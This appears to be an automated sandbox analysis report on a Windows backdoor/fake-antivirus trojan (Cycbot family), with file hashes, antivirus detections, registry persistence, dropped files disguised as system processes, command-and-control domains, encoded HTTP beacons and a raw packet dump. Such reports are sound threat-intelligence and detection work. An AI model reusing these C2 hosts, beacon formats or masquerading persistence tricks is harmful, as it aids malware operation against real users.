Analysis Date2015-01-17 13:44:44
MD5f151e50d0e7c58612dc5d34486c06932
SHA1c01f6eae0176db05b4bfa096fdd2d13dab3683f1

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 0a5dffdbf8b9c55fb6d1982b8c7b2a4c sha1: 8829e2c484f629046e967a449ce001cdef80b63d size: 137728
Section.rdata md5: 84bc70bc0c45ebfd5f01697d1f80bc91 sha1: 52f4359e9379a3d78aed21b0231321dec3869834 size: 2560
Section.data md5: 015e5cbc62153b3d4fef8c73a978cd0c sha1: c2235a14504dbb0a58d6fb3827b1ca62f6e02560 size: 26112
Section.crt md5: dbe569613ca1291baa660110f4029db6 sha1: 854818c7e358401bf26ea83d2031fd951f582fc8 size: 512
Timestamp2005-11-05 22:05:57
VersionPrivateBuild: 1134
PEhash4e2c84ea12979ff37a510849e80d927937f6d3e7
IMPhash7b8a3959d1cc2186e57b5e6937fe4d33
AV360 Safeno_virus
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Trojan.Heur.KS.1
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)TR/Agent.psa.33
AVBullGuardGen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Win32/FakeSpypro.B!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Agent-139999
AVDr. WebTrojan.DownLoader1.62144
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.KFV
AVFortinetW32/FakeAV.PACK!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado
AVF-SecureTrojan-Downloader:W32/Agent.DQLH
AVGrisoft (avg)Cryptic.CCK
AVIkarusGen.Variant.Kazy
AVK7Backdoor ( 003210941 )
AVKasperskyHoax.Win32.ArchSMS.gen
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.h
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVRisingTrojan.Win32.Generic.12767F36
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen2
AVTrend MicroBKDR_CYCBOT.SMIB
AVVirusBlokAda (vba32)Malware-Cryptor.Limpopo

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSofflineservermonitoring.com
Winsock DNS127.0.0.1
Winsock DNSzonere.com
Winsock DNSzonetk.com
Winsock DNSrossroadbags.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSrossroadbags.com
Type: A
50.56.218.189
DNSzonetf.com
Type: A
141.8.225.80
DNSzonetk.com
Type: A
DNSofflineservermonitoring.com
Type: A
DNSzonere.com
Type: A
HTTP GEThttp://rossroadbags.com/images/p_thumb/3521.jpg?tq=gP4aKydlxIAUQjLd11JEgWF2a0B6hr%2BkFV3LSkv%2BvuszGHEAlVXOlgdKJpido9OfPJqHhwgnAbCWxROt6Hx2P5Jhu5v5IH1XhjsV5fqGs4KkXmzK8yekoISjTNy1Hy60EKGdkZUF7tKHBx7Bz%2FmA22%2F4%2BMy5ummeAm%2BIoFmK0hMm3Ys5mVRyCqZI3f4tFK%2F9dgf8OLo%2Fg9XpADQZedoiUNm8IuL5THP6jguidUjLHo04mbuLj%2Fy40Hw64gzFiFe7ZN1ifIfWxLp7vIP29i3dp%2F%2FrOe454rypIQ7laPiImNBakx6C0uA38dZ4TPj9ehVt4RIRYP2JtYB9N%2F3XPMUw1KIHPc75cQPtx3lQfziBQRzNyZOdXk7ucuUCJsJV5gmT7qZI3hvYViewaoI8Vd%2Bb5wDQLoT6%2F4kGdTsjqBj2FzKPPUscOgkdU5fYb4jO0BRth
User-Agent: iamx/3.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 50.56.218.189:80
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 705f7468   GET /images/p_th
0x00000010 (00016)   756d622f 33353231 2e6a7067 3f74713d   umb/3521.jpg?tq=
0x00000020 (00032)   67503461 4b79646c 78494155 516a4c64   gP4aKydlxIAUQjLd
0x00000030 (00048)   31314a45 67574632 61304236 68722532   11JEgWF2a0B6hr%2
0x00000040 (00064)   426b4656 334c536b 76253242 7675737a   BkFV3LSkv%2Bvusz
0x00000050 (00080)   47484541 6c56584f 6c67644b 4a706964   GHEAlVXOlgdKJpid
0x00000060 (00096)   6f394f66 504a7148 6877676e 41624357   o9OfPJqHhwgnAbCW
0x00000070 (00112)   78524f74 36487832 50354a68 75357635   xROt6Hx2P5Jhu5v5
0x00000080 (00128)   49483158 686a7356 35667147 73344b6b   IH1XhjsV5fqGs4Kk
0x00000090 (00144)   586d7a4b 3879656b 6f49536a 544e7931   XmzK8yekoISjTNy1
0x000000a0 (00160)   48793630 454b4764 6b5a5546 37744b48   Hy60EKGdkZUF7tKH
0x000000b0 (00176)   42783742 7a253246 6d413232 25324634   Bx7Bz%2FmA22%2F4
0x000000c0 (00192)   2532424d 7935756d 6d65416d 25324249   %2BMy5ummeAm%2BI
0x000000d0 (00208)   6f466d4b 30684d6d 33597335 6d565279   oFmK0hMm3Ys5mVRy
0x000000e0 (00224)   43715a49 33663474 464b2532 46396467   CqZI3f4tFK%2F9dg
0x000000f0 (00240)   66384f4c 6f253246 67395870 4144515a   f8OLo%2Fg9XpADQZ
0x00000100 (00256)   65646f69 554e6d38 49754c35 54485036   edoiUNm8IuL5THP6
0x00000110 (00272)   6a677569 64556a4c 486f3034 6d62754c   jguidUjLHo04mbuL
0x00000120 (00288)   6a253246 79343048 77363467 7a466946   j%2Fy40Hw64gzFiF
0x00000130 (00304)   65375a4e 31696649 6657784c 70377649   e7ZN1ifIfWxLp7vI
0x00000140 (00320)   50323969 33647025 32462532 46724f65   P29i3dp%2F%2FrOe
0x00000150 (00336)   34353472 79704951 376c6150 69496d4e   454rypIQ7laPiImN
0x00000160 (00352)   42616b78 36433075 41333864 5a345450   Bakx6C0uA38dZ4TP
0x00000170 (00368)   6a396568 56743452 49525950 324a7459   j9ehVt4RIRYP2JtY
0x00000180 (00384)   42394e25 32463358 504d5577 314b4948   B9N%2F3XPMUw1KIH
0x00000190 (00400)   50633735 63515074 78336c51 667a6942   Pc75cQPtx3lQfziB
0x000001a0 (00416)   51527a4e 795a4f64 586b3775 63755543   QRzNyZOdXk7ucuUC
0x000001b0 (00432)   4a734a56 35676d54 37715a49 33687659   JsJV5gmT7qZI3hvY
0x000001c0 (00448)   56696577 616f4938 56642532 42623577   ViewaoI8Vd%2Bb5w
0x000001d0 (00464)   44514c6f 54362532 46346b47 6454736a   DQLoT6%2F4kGdTsj
0x000001e0 (00480)   71426a32 467a4b50 50557363 4f676b64   qBj2FzKPPUscOgkd
0x000001f0 (00496)   55356659 62346a4f 30425274 68204854   U5fYb4jO0BRth HT
0x00000200 (00512)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000210 (00528)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000220 (00544)   20726f73 73726f61 64626167 732e636f    rossroadbags.co
0x00000230 (00560)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000240 (00576)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x00000250 (00592)   2f332e31 310d0a0d 0a                  /3.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6f5825 32425039 68253242 49307344   JoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a724f65   on: close....rOe
0x00000150 (00336)   34353472 79704951 376c6150 69496d4e   454rypIQ7laPiImN
0x00000160 (00352)   42616b78 36433075 41333864 5a345450   Bakx6C0uA38dZ4TP
0x00000170 (00368)   6a396568 56743452 49525950 324a7459   j9ehVt4RIRYP2JtY
0x00000180 (00384)   42394e25 32463358 504d5577 314b4948   B9N%2F3XPMUw1KIH
0x00000190 (00400)   50633735 63515074 78336c51 667a6942   Pc75cQPtx3lQfziB
0x000001a0 (00416)   51527a4e 795a4f64 586b3775 63755543   QRzNyZOdXk7ucuUC
0x000001b0 (00432)   4a734a56 35676d54 37715a49 33687659   JsJV5gmT7qZI3hvY
0x000001c0 (00448)   56696577 616f4938 56642532 42623577   ViewaoI8Vd%2Bb5w
0x000001d0 (00464)   44514c6f 54362532 46346b47 6454736a   DQLoT6%2F4kGdTsj
0x000001e0 (00480)   71426a32 467a4b50 50557363 4f676b64   qBj2FzKPPUscOgkd
0x000001f0 (00496)   55356659 62346a4f 30425274 68204854   U5fYb4jO0BRth HT
0x00000200 (00512)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000210 (00528)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000220 (00544)   20726f73 73726f61 64626167 732e636f    rossroadbags.co
0x00000230 (00560)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000240 (00576)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x00000250 (00592)   2f332e31 310d0a0d 0a                  /3.11....


Strings
Q
.
@
A
..
040904b0
1134
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
1b2.Rfk
1YJMD=<
/)}4*@
4X0Anw
*[;5:8)
+6)+]-
*6fXbs
[<6h<0@
^6hAe@
`6h^D@
(6h(i@
6i/;X_
6{R#92'
7*i**0
<8&];91
[8/\;M
9i9||p
9'rlho|T
.A/8Di
ADVAPI32.dll
a<R!s=
?atln3
&}aZFv;
B*c&Xjq)
-/Bt8xw
CloseHandle
CoCreateGuid
CoCreateInstance
CoInitialize
CoSetProxyBlanket
CoUninitialize
CreateFileA
d*)2,d
@.data
DeleteCriticalSection
dIK8zJ
ejoB-}
EnterCriticalSection
EnumResourceNamesA
EnumSystemLocalesA
ExitProcess
F6h2Z@
F6hQk@
fbG~lU 
=FYt`"
f*/*zt
GetClassLongA
GetCommandLineA
GetConsoleOutputCP
GetCPInfo
GetCurrentDirectoryW
GetCurrentProcess
GetCurrentThreadId
GetFullPathNameA
GetFullPathNameW
GetLastError
GetLocaleInfoW
GetModuleFileNameW
GetModuleHandleA
GetProcAddress
GetProcessHeap
GetThreadPriority
GetUserDefaultLCID
GetVersionExA
GlobalAlloc
gPCCI	
H6h=G@
h`6hMy@
^,h9.+
HeapAlloc
HeapFree
HeapReAlloc
HeapSize
H|	hwa
hI6hta@
&'+?%I;
InitializeCriticalSection
InterlockedDecrement
InterlockedIncrement
IsDebuggerPresent
IsValidCodePage
IsValidLocale
j|kX5[="
J})p2o
KERNEL32.dll
</{KkWkE
k.V	jj
L	4-YZ
l_6nJ6
+lA3n#
LCMapStringA
LCMapStringW
LeaveCriticalSection
*l*X:UJ
LyWo)i
}M***=
MessageBoxW
%M IVL
MJ?8Gh
MultiByteToWideChar
m,:|,v1
;)^n.%
/*-_*n
nRP(x?V|S$
NuS{m[
ole32.dll
Oo8I8P
p7}G>4R
pFGTFb
QsW{5!.
Q_sx7r$
RaiseException
`.rdata
R&e;6zZ~
ReadFile
RegCloseKey
RegCreateKeyExW
RegSetValueExW
RPCRT4.dll
RtlUnwind
Ru.c<Ao
SetCommConfig
SetEndOfFile
SetStdHandle
SetUnhandledExceptionFilter
SHCreateDirectoryExW
SHELL32.dll
SHFileOperationW
SHGetFolderPathW
-sKl`5
*sro Ui2
StringFromGUID2
sZ^lkL
T<a6hFE@
Te3-~-l
TerminateProcess
t/F't/-
!This program cannot be run in DOS mode.
ThLoad
Tje6ht
~TP6h	Y@
u$6hnq@
UAebq`
u~i`b9
uJl>IB
UnhandledExceptionFilter
USER32.dll
UuidCreate
veh~.#
V**[[g
V*g/91
v>|Jnd
^?VKMl3
v;pgs2
w71^XM
WideCharToMultiByte
WJ#SQ$
WriteConsoleA
WriteConsoleW
WriteFile
]X$Mpb
Y6hsQ@
y"?tr%
zwN+HG
ZZ~/xD